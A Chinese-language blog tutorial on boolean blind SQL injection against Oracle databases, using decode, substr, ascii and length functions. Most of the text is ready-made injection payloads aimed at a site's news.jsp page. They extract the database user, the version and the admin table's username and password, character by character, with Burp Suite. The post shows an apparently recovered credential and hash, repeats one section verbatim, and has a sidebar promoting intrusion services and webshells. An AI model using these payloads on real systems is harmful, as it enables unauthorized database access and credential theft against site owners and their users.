1、在oracle两种利用布尔型实现盲注入方法
l 是否存在注入 根据页面的返回不同 从而判断注入点。
l 出数据 通过注入点 构造的SQL语句 判断页面是否正常。
2、decode 盲注入
decode(字段或字段的运算,值1,值2,值3)
这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3
当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多
使用方法:
比较大小
select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值
sign()函数根据某个值是0、正数还是负数,分别返回0、1、-1
例如:
变量1=10,变量2=20
则sign(变量1-变量2)返回-1,decode解码结果为“变量1”,达到了取较小值的目的。
1+3=4 返回1 不等于返回0
select decode(1+3,4,1,0) from dual; select decode(user,'SYSTEM',1,0) from dual;
获取当前用户 (select user from dual)
获取当前版本 (select banner from sys.v_$versionwhere rownum=1)
获取当前admin表的帐号和密码 (selectusername||password from admin)
获取字符长度
select length(user) from dual -- select * from artwhere id=1 and 6=(select length(user) from dual) -- http://www.jsporcle.com/news.jsp?id=1 and 6=(select length(user) from dual) --
当前用户第一个字母的是否等于S 等于返回1否则返回0
(selectd ecode(substr(user,1,1),'S',1,0) from dual) -- (selectd ecode(substr(user,2,1),'Y',1,0) from dual) -- (selectd ecode(substr(user,3,1),'S',1,0) from dual) -- (selectd ecode(substr(user,4,1),'T',1,0) from dual) -- (selectd ecode(substr(user,5,1),'E',1,0) from dual) -- (selectd ecode(substr(user,6,1),'N',1,0) from dual) --
测试当前用户语句
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
获取当前admin表的帐号和密码
select * from artwhere id=1 and 1=(select decode(substr((select username||password fromadmin),1,1),'a',1,0) from dual) http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword fromadmin),1,1),'a',1,0)
from dual)
判断字符的字符
abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.
查询第二个的时候
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),2,1),'d',1,0)from dual)
admin
用burpsuite测试盲注入
select * from art where id=1 and 37=(select length(username||password) from admin);
猜解ascii码
substr截取字符串长度
ascii 把字符的ASCII转出来
(select ascii(substr(username||password,1,1)) from admin);
http://www.jsporcle.com/news.jsp?id=1 and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97
第二个截取
http://www.jsporcle.com/news.jsp?id=1 and (select ascii(substr(username%7c%7cpassword,2,1)) from admin)=97
用burpsuite猜解第二个字符的ascii是100 转为字符就是d
admine10adc3949ba59abbe56e057f20f883e
3、盲注入通用 逐字猜解法
先获取数据长度
37=(select length(username||password)from admin)
转码测试
and 37=(select length(username%7c%7cpassword) from admin)--
3、盲注入通用 逐字猜解法
先获取数据长度
37=(select length(username||password)from admin)
转码测试
and 37=(select length(username%7c%7cpassword) from admin)-- select * from artwhere id=1 and 37=(select length(username||password) from admin);
猜解ascii码
substr截取字符串长度
ascii 把字符的ASCII转出来
(select ascii(substr(username||password,1,1)) from admin);
http://www.jsporcle.com/news.jsp?id=1and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97
第二个截取
http://www.jsporcle.com/news.jsp?id=1and (select ascii(substr(username%7c%7cpassword,2,1)) from admin)=97
用burpsuite猜解第二个字符的ascii是100 转为字符就是d
admine10adc3949ba59abbe56e057f20f883e
猜你还喜欢
- 07-08八年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 01-12批量检测SQL注入
- 01-22Apache Solr远程代码执行漏洞(CVE-2017-12629)从利用到入侵检测
- 随机文章
-
- Amass:一款深度子域名枚举工具
- 微信支付SDK 0元购Hack思路分享
- 某些圈内的“黑客”是真无聊
- 使用scapy进行ARP攻击
- 利用Github对安全人员进行钓鱼
- 探索基于.NET下实现一句话木马之ashx篇
- 移动端跨越攻击预警:新型APT攻击方式解析
- 对暗网黑市廉价RDP销售商店的调查
- 超级详细的一次提权流程
- 白帽子的指南
- 当Strust2遇到防火墙,你的思路够骚吗?
- 在Web服务器防止Host头攻击
- Ph0neutria:一款从野外采集恶意软件样本的工具
- 对自助提卡系统的一次代码审计
- 超过1万个基于WordPress的网站被黑客攻击
- “退改签”诈骗背后,到底谁为黑产大开方便之门?
- 经验分享|谈谈渗透测试中的信息搜集
- 技术讨论 | 记一次Node.Js反序列化攻击测试
- 99%的人都不知道的秘密:世上竟有如此酷炫的钓鱼系统!
- 文件上传限制绕过技巧
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 渗透测试培训(第五期)
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
文章存档
- 2021年3月(4)
- 2020年12月(4)
- 2020年11月(5)
- 2020年10月(8)
- 2020年9月(8)
- 2020年8月(20)
- 2020年7月(47)
- 2020年6月(70)
- 2020年5月(41)
- 2020年4月(21)
- 2020年3月(120)
- 2020年2月(26)
- 2019年12月(12)
- 2019年11月(13)
- 2019年10月(17)
- 2019年9月(15)
- 2019年8月(13)
- 2019年7月(15)
- 2019年6月(15)
- 2019年5月(19)
- 2019年4月(23)
- 2019年3月(19)
- 2019年2月(11)
- 2019年1月(29)
- 2018年12月(24)
- 2018年11月(56)
- 2018年10月(79)
- 2018年9月(20)
- 2018年8月(17)
- 2018年7月(16)
- 2018年6月(7)
- 2018年5月(10)
- 2018年3月(6)
- 2018年2月(2)
- 2018年1月(11)
- 2017年11月(18)
- 2017年10月(6)
- 2017年9月(8)
- 2017年8月(7)
- 2017年7月(7)
- 2017年6月(15)
- 2017年5月(30)
- 2017年4月(7)
- 2017年3月(1)
- 2017年2月(4)
- 2017年1月(1)
- 2016年12月(3)
- 2016年11月(7)
- 2016年10月(6)
- 2016年9月(6)
- 2016年8月(102)
- 2016年7月(24)
- 2013年7月(1)
- 文章标签
-